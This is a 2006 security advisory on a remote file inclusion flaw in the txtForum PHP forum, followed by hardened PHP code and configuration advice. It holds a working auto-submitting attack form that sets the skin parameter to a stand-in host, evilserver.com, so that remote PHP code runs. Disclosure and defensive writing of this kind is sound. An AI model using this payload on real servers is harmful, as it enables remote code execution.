txtForum (http://sourceforge.net/projects/txtforum1)
Versions 1.0.4-dev and prior.
The file common.php contains an include statement on line 46 that uses the SKIN constant, which
is defined earlier from the $skin variable. If the application never initializes $skin, its value can be
supplied by the attacker, and the include statement then loads attacker-controlled PHP code. Under these
conditions an attacker can inject arbitrary PHP script into the application:
all the attacker has to do is find a path through the program that doesn't initialize the $skin variable.
The attacker does not require access to an account in the forum. Here is an example of an attack page:
<form action="http://localhost/txtforum104/login.php" method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://evilserver.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
This leads to execution of the code in http://evilserver.com/header.tpl. Similar include statements on
lines 53 and 61 of the same file may offer further possibilities for exploitation.
There is no solution to this issue yet.
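For maintainers and code reviewers, the pattern below contrasts the vulnerable construct described above with a hardened form. This is an added illustration written for this advisory, not txtForum's code: the names $skin, SKIN and header.tpl come from the advisory, while the skin directory layout, the allowed skin names and the helper function names are assumptions.

```php
<?php
// Illustration of the include pattern described in the advisory.
// This is NOT txtForum's source; names follow the advisory, the rest is assumed.

// --- Vulnerable pattern (reconstructed) ---
// If no code path assigns $skin a trusted value, a request parameter named
// "skin" can supply it (e.g. via register_globals). The unvalidated string
// then becomes the prefix of the include path.
function vulnerable_skin_path(): string
{
    global $skin;                     // may be attacker-controlled
    define('SKIN', $skin);            // no validation at all
    return SKIN . '/header.tpl';      // e.g. "http://evilserver.com/header.tpl"
}

// --- Hardened pattern ---
// Treat the parameter as a selector into a fixed allowlist, never as a path,
// and build the include path relative to a directory the application owns.
const SKIN_DIR      = __DIR__ . '/skins';     // assumed directory layout
const ALLOWED_SKINS = ['default', 'dark'];    // assumed skin names

function safe_skin_path(?string $requested): string
{
    // Unknown, missing or malformed selectors fall back to the default skin.
    $name = ($requested !== null && in_array($requested, ALLOWED_SKINS, true))
        ? $requested
        : 'default';
    $path = SKIN_DIR . '/' . $name . '/header.tpl';

    // Defence in depth: realpath() resolves symlinks and any "../", and the
    // prefix check confirms the result still lies inside SKIN_DIR.
    $real    = realpath($path);
    $baseDir = realpath(SKIN_DIR);
    if ($real === false || $baseDir === false
        || strpos($real, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('skin template outside skin directory');
    }
    return $real;
}

// Usage: read the selector explicitly from the request instead of relying on
// register_globals, so an unset parameter can never masquerade as a local.
$skinParam = $_POST['skin'] ?? $_GET['skin'] ?? null;
include safe_skin_path($skinParam);
```

Two configuration settings reduce the impact of this bug class independently of the code fix: register_globals = Off stops request parameters from silently populating variables such as $skin, and allow_url_include = Off (available from PHP 5.2) prevents include from fetching code over HTTP at all. Neither replaces validating the selector, since a local file inclusion would still be possible with an unvalidated path.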
Timeline:
March 2, 2006:
Vulnerability reported to and acknowledged by the developer (I.Konforti).
A fix is not planned.
March 9, 2006:
Advisory submission.
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at